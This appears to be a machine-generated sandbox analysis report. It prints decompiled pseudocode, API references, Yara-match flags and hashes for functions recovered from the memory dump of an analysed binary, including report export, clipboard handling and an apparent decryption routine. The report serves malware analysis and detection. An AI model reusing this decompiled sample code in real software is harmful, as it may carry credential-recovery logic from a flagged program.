				char* _t39;
				intOrPtr _t51;
				int _t60;
				intOrPtr* _t73;
				int _t76;
				void* _t80;

				_t80 = __eflags;
				E004118A0(0x16a0, __ecx);
				_t39 = wcslen(_a8);
				_t2 =  &(_t39[1]); // 0x1
				_t76 = _t2;
				_push(_t76);
				L004115D0();
				_t60 = 0;
				_v8 = _t39;
				 *_t39 = 0;
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t39, _t76, 0, 0);
				_t77 =  &_v5796;
				E0040FE05( &_v5796, _t80);
				_v5796 = 0x4144ac;
				E004104BC( &_v3636);
				E004104BC( &_v1824);
				_t73 = _a4;
				_v3640 =  *((intOrPtr*)(_t73 + 4));
				_v12 = _t73;
				_a8 = strlen(_v8);
				E0040FF76(_t47, _t77);
				memcpy(_v5768, _v8, _a8);
				E00410081(_t77, _t80);
				_t51 =  *((intOrPtr*)(_t73 + 4));
				_v1840 = _t51;
				_v28 = _t51;
				if(_v2100 != 0 || _v2612 != 0) {
					if(_v1844 != _t60) {
						if(_v1568 != _t60) {
							E004060D0(0xff,  &_v3124,  &_v1568);
							_t73 = _a4;
							_v1828 = _v24;
							_t60 = 0;
						}
						 *((intOrPtr*)( *_t73))( &_v3636);
					}
				}
				if(_v288 != _t60 || _v800 != _t60) {
					if(_v32 != _t60) {
						 *((intOrPtr*)( *_t73))( &_v1824);
					}
				}
				_push(_v8);
				L004115D6();
				return E0040FEED( &_v5796);
			}































                                                                                0x00410a8a
                                                                                0x00410a92
                                                                                0x00410a9d
                                                                                0x00410aa2
                                                                                0x00410aa2
                                                                                0x00410aa5
                                                                                0x00410aa6
                                                                                0x00410aad
                                                                                0x00410ab8
                                                                                0x00410abd
                                                                                0x00410abf
                                                                                0x00410ac5
                                                                                0x00410acb
                                                                                0x00410ad6
                                                                                0x00410ae0
                                                                                0x00410aeb
                                                                                0x00410af0
                                                                                0x00410af9
                                                                                0x00410aff
                                                                                0x00410b08
                                                                                0x00410b0b
                                                                                0x00410b1c
                                                                                0x00410b26
                                                                                0x00410b31
                                                                                0x00410b34
                                                                                0x00410b3a
                                                                                0x00410b3d
                                                                                0x00410b4d
                                                                                0x00410b55
                                                                                0x00410b69
                                                                                0x00410b71
                                                                                0x00410b75
                                                                                0x00410b7b
                                                                                0x00410b7b
                                                                                0x00410b88
                                                                                0x00410b88
                                                                                0x00410b4d
                                                                                0x00410b90
                                                                                0x00410b9d
                                                                                0x00410baa
                                                                                0x00410baa
                                                                                0x00410b9d
                                                                                0x00410bac
                                                                                0x00410baf
                                                                                0x00410bc4

                                                                                APIs
                                                                                • wcslen.MSVCRT ref: 00410A9D
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00410AA6
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00410C2C,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00410C2C,?,00000000), ref: 00410ABF
                                                                                  • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE1A
                                                                                  • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE38
                                                                                  • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE53
                                                                                  • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE7C
                                                                                  • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FEA0
                                                                                • strlen.MSVCRT ref: 00410B02
                                                                                  • Part of subcall function 0040FF76: ??3@YAXPAX@Z.MSVCRT ref: 0040FF81
                                                                                  • Part of subcall function 0040FF76: ??2@YAPAXI@Z.MSVCRT ref: 0040FF90
                                                                                • memcpy.MSVCRT ref: 00410B1C
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00410BAF
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                • String ID:
                                                                                • API String ID: 577244452-0
                                                                                • Opcode ID: eda384fdfc038d1513b3794fcc6cadf0bacc3feb473f8e14eb1b45133d0eb622
                                                                                • Instruction ID: 5b66efc9566b80317fa540751e9ebc59d69584110078b55da7be64cca713082c
                                                                                • Opcode Fuzzy Hash: eda384fdfc038d1513b3794fcc6cadf0bacc3feb473f8e14eb1b45133d0eb622
                                                                                • Instruction Fuzzy Hash: 44317672804219AFCF21EFA1C8809EDBBB5AF44314F1440AAE508A3251DB796FC4CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040AB54, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040AB54(void* __edi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				void _v1095;
				char _v1096;
				void* __ebx;
				char _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t39;
				void* _t52;
				char _t59;
				char* _t60;
				intOrPtr _t61;

				_v1096 = 0;
				memset( &_v1095, 0, 0x3ff);
				_v8 = 0x747874;
				_t29 = E004078FF(0x1f5);
				_t59 = "*.txt";
				_v72 = _t29;
				_v68 = _t59;
				_v64 = E004078FF(0x1f6);
				_v60 = _t59;
				_v56 = E004078FF(0x1f7);
				_v52 = _t59;
				_t32 = E004078FF(0x1f8);
				_t60 = "*.htm;*.html";
				_v48 = _t32;
				_v44 = _t60;
				_v40 = E004078FF(0x1f9);
				_v36 = _t60;
				_v32 = E004078FF(0x1fa);
				_v28 = "*.xml";
				_t35 = E004078FF(0x1fb);
				_t61 = "*.csv";
				_v24 = _t35;
				_v20 = _t61;
				_v16 = E004078FF(0x1fc);
				_v12 = _t61;
				E0040684D( &_v1096,  &_v72, 8);
				_t52 = 7;
				_t39 = E004078FF(_t52);
				_t23 =  &_v8; // 0x747874
				return E00406680(_a8,  *((intOrPtr*)(_a4 + 0x108)), __edi,  &_v1096, _t39, _t23);
			}































                                                                                0x0040ab6d
                                                                                0x0040ab74
                                                                                0x0040ab81
                                                                                0x0040ab88
                                                                                0x0040ab8d
                                                                                0x0040ab93
                                                                                0x0040ab96
                                                                                0x0040aba3
                                                                                0x0040aba6
                                                                                0x0040abaf
                                                                                0x0040abb2
                                                                                0x0040abb5
                                                                                0x0040abba
                                                                                0x0040abc4
                                                                                0x0040abc7
                                                                                0x0040abd0
                                                                                0x0040abd3
                                                                                0x0040abe0
                                                                                0x0040abe3
                                                                                0x0040abea
                                                                                0x0040abef
                                                                                0x0040abf5
                                                                                0x0040abf8
                                                                                0x0040ac00
                                                                                0x0040ac0f
                                                                                0x0040ac12
                                                                                0x0040ac1b
                                                                                0x0040ac1c
                                                                                0x0040ac24
                                                                                0x0040ac44

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040AB74
                                                                                  • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                                                  • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                                  • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,73B74DE0), ref: 0040797A
                                                                                  • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                                                  • Part of subcall function 0040684D: memset.MSVCRT ref: 0040686D
                                                                                  • Part of subcall function 0040684D: sprintf.MSVCRT ref: 0040689A
                                                                                  • Part of subcall function 0040684D: strlen.MSVCRT ref: 004068A6
                                                                                  • Part of subcall function 0040684D: memcpy.MSVCRT ref: 004068BB
                                                                                  • Part of subcall function 0040684D: strlen.MSVCRT ref: 004068C9
                                                                                  • Part of subcall function 0040684D: memcpy.MSVCRT ref: 004068D9
                                                                                  • Part of subcall function 00406680: GetSaveFileNameA.COMDLG32(?), ref: 004066CF
                                                                                  • Part of subcall function 00406680: strcpy.MSVCRT(?,?), ref: 004066E6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memcpystrlen$memsetstrcpy$FileLoadNameSaveStringsprintf
                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                • API String ID: 4021364944-3614832568
                                                                                • Opcode ID: 47d6f0de7c66cadcf7d9a44beb2654d42ee3cfb16f185572a55cd809b74eca63
                                                                                • Instruction ID: 4d38638b85bcf07ffefc140bede2392a268d493de89ddae44be4c2da79bd640a
                                                                                • Opcode Fuzzy Hash: 47d6f0de7c66cadcf7d9a44beb2654d42ee3cfb16f185572a55cd809b74eca63
                                                                                • Instruction Fuzzy Hash: B62101B2D442589ECB01FF99D8857DDBBB4BB04304F10417BE619B7282D7381A45CB5A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406491, Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 72%
                                                                                			E00406491(void* __edx, struct HWND__* _a4) {
				int _v8;
				struct tagRECT _v24;
				int _t17;
				void* _t36;
				struct HDC__* _t38;

				_t36 = __edx;
				_t38 = GetDC(0);
				_t17 = GetDeviceCaps(_t38, 8);
				_v8 = GetDeviceCaps(_t38, 0xa);
				ReleaseDC(0, _t38);
				GetWindowRect(_a4,  &_v24);
				asm("cdq");
				asm("cdq");
				return MoveWindow(_a4, _v24.left - _v24.right + _t17 - 1 - _t36 >> 1, _v24.top - _v24.bottom + _v8 - 1 - _v8 >> 1, _v24.right - _v24.left + 1, _v24.bottom - _v24.top + 1, 1);
			}








                                                                                0x00406491
                                                                                0x004064a8
                                                                                0x004064ad
                                                                                0x004064b9
                                                                                0x004064bc
                                                                                0x004064c9
                                                                                0x004064e1
                                                                                0x004064f5
                                                                                0x00406511

                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 0040649C
                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 004064AD
                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004064B4
                                                                                • ReleaseDC.USER32 ref: 004064BC
                                                                                • GetWindowRect.USER32 ref: 004064C9
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00406507
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CapsDeviceWindow$MoveRectRelease
                                                                                • String ID:
                                                                                • API String ID: 3197862061-0
                                                                                • Opcode ID: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
                                                                                • Instruction ID: 542b186de9fc11de55873c3549d90df3c6ab5362d14aa96611489808ae4c73e2
                                                                                • Opcode Fuzzy Hash: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
                                                                                • Instruction Fuzzy Hash: FC117C31A0011AAFDB009BB9CE4DEEFBFB8EB84711F014165E901E7250D6B0AD01CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403A8D, Relevance: 9.1, APIs: 6, Instructions: 56filestringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 95%
                                                                                			E00403A8D(void* __ecx, void* __eflags, void* _a4, char* _a8) {
				long _v8;
				void _v8199;
				char _v8200;
				void _v24582;
				short _v24584;

				E004118A0(0x6004, __ecx);
				_v24584 = 0;
				memset( &_v24582, 0, 0x3ffe);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				MultiByteToWideChar(0, 0, _a8, 0xffffffff,  &_v24584, 0x1fff);
				WideCharToMultiByte(0xfde9, 0,  &_v24584, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}








                                                                                0x00403a95
                                                                                0x00403aab
                                                                                0x00403ab2
                                                                                0x00403ac5
                                                                                0x00403acb
                                                                                0x00403ae2
                                                                                0x00403b01
                                                                                0x00403b2d

                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403AB2
                                                                                • memset.MSVCRT ref: 00403ACB
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AE2
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403B01
                                                                                • strlen.MSVCRT ref: 00403B13
                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403B24
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                • String ID:
                                                                                • API String ID: 1786725549-0
                                                                                • Opcode ID: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
                                                                                • Instruction ID: d8056d974a042835a8b53dd5956248081512f57f3cb7fafeec888b91cb2496ed
                                                                                • Opcode Fuzzy Hash: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
                                                                                • Instruction Fuzzy Hash: 6A1161B244012CBEFB009B94DD85DEB77ADEF08354F0041A6B70AD2091D6349F94CB78
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040AC8A, Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040AC8A(void* __eax, void* __ebx) {
				char _v264;
				char _v524;
				void* __edi;
				void* __esi;
				long _t13;
				void* _t18;
				int _t19;
				long _t20;
				void* _t27;
				void* _t31;

				_t27 = __ebx;
				_t31 = __eax;
				_t13 = GetTempPathA(0x104,  &_v524);
				_t32 = _t13;
				if(_t13 == 0) {
					GetWindowsDirectoryA( &_v524, 0x104);
				}
				_v264 = 0;
				GetTempFileNameA( &_v524, "cp", 0,  &_v264);
				_t18 = E0040AC47(_t31, _t32,  &_v264, 2, 1);
				if(_t18 != 0) {
					_t19 = OpenClipboard( *(_t31 + 0x108));
					_t34 = _t19;
					if(_t19 == 0) {
						_t20 = GetLastError();
					} else {
						_t20 = E00405FC6(_t27, 0x104, _t31, _t34,  &_v264);
					}
					if(_t20 != 0) {
						E00405F41(_t20,  *(_t31 + 0x108));
					}
					return DeleteFileA( &_v264);
				}
				return _t18;
			}













                                                                                0x0040ac8a
                                                                                0x0040ac95
                                                                                0x0040aca4
                                                                                0x0040acaa
                                                                                0x0040acac
                                                                                0x0040acb6
                                                                                0x0040acb6
                                                                                0x0040acd1
                                                                                0x0040acd8
                                                                                0x0040ace9
                                                                                0x0040acf0
                                                                                0x0040acf8
                                                                                0x0040acfe
                                                                                0x0040ad00
                                                                                0x0040ad11
                                                                                0x0040ad02
                                                                                0x0040ad09
                                                                                0x0040ad0e
                                                                                0x0040ad19
                                                                                0x0040ad21
                                                                                0x0040ad26
                                                                                0x00000000
                                                                                0x0040ad2e
                                                                                0x0040ad37

                                                                                APIs
                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 0040ACA4
                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040ACB6
                                                                                • GetTempFileNameA.KERNEL32(?,0041341C,00000000,?), ref: 0040ACD8
                                                                                • OpenClipboard.USER32(?), ref: 0040ACF8
                                                                                • GetLastError.KERNEL32 ref: 0040AD11
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0040AD2E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                • String ID:
                                                                                • API String ID: 2014771361-0
                                                                                • Opcode ID: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
                                                                                • Instruction ID: 1632bef886f39339d389646b63a05c30f7573d4ca20e624e383ab74febbb07e7
                                                                                • Opcode Fuzzy Hash: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
                                                                                • Instruction Fuzzy Hash: E0118272504318ABDB209B60DD49FDB77BC9F14701F0001B6F689E2091DBB8DAD4CB29
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406585, Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 53stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 86%
                                                                                			E00406585(char* __edi, intOrPtr _a4, signed int _a8) {
				void _v259;
				char _v260;
				char* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_t37 = _t36 + 0xc;
				 *__edi = 0;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					sprintf( &_v260, "%2.2X");
					_t37 = _t37 + 0xc;
					if(_t35 > 0) {
						strcat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							strcat(_t34, "  ");
						}
					}
					strcat(_t34,  &_v260);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                                                0x00406585
                                                                                0x0040659d
                                                                                0x004065a4
                                                                                0x004065a9
                                                                                0x004065ac
                                                                                0x004065af
                                                                                0x004065b1
                                                                                0x004065b8
                                                                                0x004065c5
                                                                                0x004065ca
                                                                                0x004065cf
                                                                                0x004065d7
                                                                                0x004065dd
                                                                                0x004065e2
                                                                                0x004065e6
                                                                                0x004065ec
                                                                                0x004065f4
                                                                                0x004065fa
                                                                                0x004065ec
                                                                                0x00406603
                                                                                0x00406608
                                                                                0x00406610
                                                                                0x00406617

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strcat$memsetsprintf
                                                                                • String ID: %2.2X
                                                                                • API String ID: 582077193-791839006
                                                                                • Opcode ID: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
                                                                                • Instruction ID: 9ba21b13147b7bc42f3eaeb5b708c7057566a78b4f06b3a82068ff28b5e275af
                                                                                • Opcode Fuzzy Hash: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
                                                                                • Instruction Fuzzy Hash: 54014C7294421476D7315725ED03BEA379C9B84704F10407FF986A61C5EABCDBD48798
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040FEED, Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 77%
                                                                                			E0040FEED(intOrPtr* __edi) {
				void* __esi;
				signed int _t9;
				intOrPtr* _t16;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;

				_t16 = __edi;
				_t9 =  *(__edi + 0x1c);
				 *__edi = 0x414288;
				if(_t9 != 0) {
					_push(_t9);
					L004115D6();
					 *(__edi + 0x1c) =  *(__edi + 0x1c) & 0x00000000;
				}
				_t18 =  *((intOrPtr*)(_t16 + 0x460));
				if(_t18 != 0) {
					_t9 = E00406B5B(_t18);
					_push(_t18);
					L004115D6();
				}
				_t19 =  *((intOrPtr*)(_t16 + 0x45c));
				if(_t19 != 0) {
					_t9 = E00406B5B(_t19);
					_push(_t19);
					L004115D6();
				}
				_t20 =  *((intOrPtr*)(_t16 + 0x458));
				if(_t20 != 0) {
					_t9 = E00406B5B(_t20);
					_push(_t20);
					L004115D6();
				}
				_t21 =  *((intOrPtr*)(_t16 + 0x454));
				if(_t21 != 0) {
					_t9 = E00406A4E(_t21);
					_push(_t21);
					L004115D6();
				}
				_t22 =  *((intOrPtr*)(_t16 + 0x450));
				if(_t22 != 0) {
					_t9 = E00406A4E(_t22);
					_push(_t22);
					L004115D6();
				}
				return _t9;
			}











                                                                                0x0040feed
                                                                                0x0040feed
                                                                                0x0040fef2
                                                                                0x0040fef8
                                                                                0x0040fefa
                                                                                0x0040fefb
                                                                                0x0040ff00
                                                                                0x0040ff04
                                                                                0x0040ff06
                                                                                0x0040ff0e
                                                                                0x0040ff10
                                                                                0x0040ff15
                                                                                0x0040ff16
                                                                                0x0040ff1b
                                                                                0x0040ff1c
                                                                                0x0040ff24
                                                                                0x0040ff26
                                                                                0x0040ff2b
                                                                                0x0040ff2c
                                                                                0x0040ff31
                                                                                0x0040ff32
                                                                                0x0040ff3a
                                                                                0x0040ff3c
                                                                                0x0040ff41
                                                                                0x0040ff42
                                                                                0x0040ff47
                                                                                0x0040ff48
                                                                                0x0040ff50
                                                                                0x0040ff52
                                                                                0x0040ff57
                                                                                0x0040ff58
                                                                                0x0040ff5d
                                                                                0x0040ff5e
                                                                                0x0040ff66
                                                                                0x0040ff68
                                                                                0x0040ff6d
                                                                                0x0040ff6e
                                                                                0x0040ff73
                                                                                0x0040ff75

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
                                                                                • Instruction ID: b81094b12df4fb27198692459327ff2c1ceec6e662cd9000025ff3e54110b63d
                                                                                • Opcode Fuzzy Hash: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
                                                                                • Instruction Fuzzy Hash: B0015E72A029322AC5257B26680178AA3557F41B14B06013FFA0577B824F7C799246ED
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040173B, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 44%
                                                                                			E0040173B(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                                                0x0040174a
                                                                                0x00401761
                                                                                0x0040176b
                                                                                0x00401773
                                                                                0x00401774
                                                                                0x00401778
                                                                                0x0040177d
                                                                                0x0040178d
                                                                                0x004017a3

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                • String ID:
                                                                                • API String ID: 19018683-0
                                                                                • Opcode ID: 42458483af95651e2167a539795fde663e6d8f5d0ac71463485711cad55c201f
                                                                                • Instruction ID: a11a87b208587c0640a8feba78a21dda7633aea5bad1576310b301da0c27fea9
                                                                                • Opcode Fuzzy Hash: 42458483af95651e2167a539795fde663e6d8f5d0ac71463485711cad55c201f
                                                                                • Instruction Fuzzy Hash: B6014B72900218FFDF08DFA8DD489FE7BB9FB44301F004469EE11EA194DAB1AA14CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00411366, Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 96%
                                                                                			E00411366(signed int __edx, void* _a4, intOrPtr _a8, signed int* _a12, intOrPtr* _a16) {
				signed int _v8;
				char _v16;
				char _v24;
				char _v116;
				void _v1156;
				char _v1164;
				void _v1171;
				char _v1172;
				char _v2188;
				void _v2195;
				void _v2196;
				void _v3251;
				void _v3252;
				char _v4020;
				void* __edi;
				void* __esi;
				void* _t96;
				char _t105;
				intOrPtr _t112;
				void* _t115;
				signed int _t116;
				int _t121;
				signed int* _t122;
				void* _t124;
				void* _t125;
				signed int _t128;
				signed int* _t129;
				void* _t132;

				_t116 = __edx;
				_t105 = 0;
				_v2196 = 0;
				memset( &_v2195, 0, 0x3ff);
				_v3252 = 0;
				memset( &_v3251, 0, 0x41e);
				_v1172 = 0;
				memset( &_v1171, 0, 0x41e);
				_a8 = E00410E8A(_a8,  &_v2196);
				_t121 = strlen(_a4);
				if(_a8 > 8) {
					_t137 = _t121;
					if(_t121 > 0) {
						memcpy( &_v3252, _a4, _t121);
						memcpy(_t132 + _t121 - 0xcb0,  &_v2196, 8);
						E0040BC49( &_v116);
						_t19 = _t121 + 8; // 0x8
						E0040BC6D(_t19,  &_v116,  &_v3252);
						_t127 =  &_v116;
						E0040BD0B(_t121,  &_v116,  &_v1172);
						_t23 = _t121 + 8; // 0x8
						memcpy( &_v1156,  &_v3252, _t23);
						E0040BC49( &_v116);
						_t27 = _t121 + 0x18; // 0x18
						E0040BC6D(_t27, _t127,  &_v1172);
						E0040BD0B(_t121, _t127,  &_v24);
						E0040535A( &_v4020, _t137,  &_v1164,  &_v24);
						_t122 = _a12;
						E004053D6( &_v16,  &_v1172, _t122,  &_v4020);
						_t112 = _a8;
						_t128 = 0;
						if(_t112 >= 0x18) {
							_t37 = _t112 - 0x18; // -16
							asm("cdq");
							_t128 = (_t37 + (_t116 & 0x00000007) >> 3) + 1;
						}
						if(_t128 > _t105) {
							_a4 =  &_v2188;
							_t125 = _t122 + 8;
							_v8 = _t128;
							do {
								E004053D6(_a4, _t112, _t125,  &_v4020);
								_a4 = _a4 + 8;
								_t125 = _t125 + 8;
								_t45 =  &_v8;
								 *_t45 = _v8 - 1;
								_pop(_t112);
							} while ( *_t45 != 0);
							_t112 = _a8;
						}
						_t96 = 8 + _t128 * 8;
						_t50 = _t96 + 8; // 0x8
						if(_t50 > _t112) {
							_t51 = _t112 - 8; // 0x0
							_t96 = _t51;
						}
						if(_t96 > _t105) {
							_t129 = _a12;
							_t124 =  &_v2188 - _t129;
							_t115 = _t96;
							do {
								 *_t129 =  *_t129 ^  *(_t124 + _t129);
								_t129 =  &(_t129[0]);
								_t115 = _t115 - 1;
							} while (_t115 != 0);
						}
						 *((char*)(_t96 + _a12)) = _t105;
						 *_a16 = 1;
						_t105 = 1;
					}
				}
				return _t105;
			}































                                                                                0x00411366
                                                                                0x00411372
                                                                                0x00411381
                                                                                0x00411387
                                                                                0x0041139a
                                                                                0x004113a0
                                                                                0x004113ae
                                                                                0x004113b4
                                                                                0x004113cd
                                                                                0x004113da
                                                                                0x004113dc
                                                                                0x004113e2
                                                                                0x004113e4
                                                                                0x004113f5
                                                                                0x0041140b
                                                                                0x00411413
                                                                                0x0041141f
                                                                                0x00411425
                                                                                0x00411431
                                                                                0x00411434
                                                                                0x00411439
                                                                                0x0041144b
                                                                                0x00411452
                                                                                0x0041145e
                                                                                0x00411463
                                                                                0x0041146c
                                                                                0x00411488
                                                                                0x0041148d
                                                                                0x0041149a
                                                                                0x0041149f
                                                                                0x004114a5
                                                                                0x004114aa
                                                                                0x004114ac
                                                                                0x004114af
                                                                                0x004114ba
                                                                                0x004114ba
                                                                                0x004114bd
                                                                                0x004114c5
                                                                                0x004114c8
                                                                                0x004114cb
                                                                                0x004114ce
                                                                                0x004114d8
                                                                                0x004114dd
                                                                                0x004114e1
                                                                                0x004114e4
                                                                                0x004114e4
                                                                                0x004114e7
                                                                                0x004114e7
                                                                                0x004114ea
                                                                                0x004114ea
                                                                                0x004114ed
                                                                                0x004114f4
                                                                                0x004114f9
                                                                                0x004114fb
                                                                                0x004114fb
                                                                                0x004114fb
                                                                                0x00411500
                                                                                0x00411502
                                                                                0x0041150b
                                                                                0x0041150d
                                                                                0x0041150f
                                                                                0x00411512
                                                                                0x00411514
                                                                                0x00411515
                                                                                0x00411515
                                                                                0x0041150f
                                                                                0x0041151b
                                                                                0x00411524
                                                                                0x00411526
                                                                                0x00411526
                                                                                0x004113e4
                                                                                0x0041152e

                                                                                APIs
                                                                                • memset.MSVCRT ref: 00411387
                                                                                • memset.MSVCRT ref: 004113A0
                                                                                • memset.MSVCRT ref: 004113B4
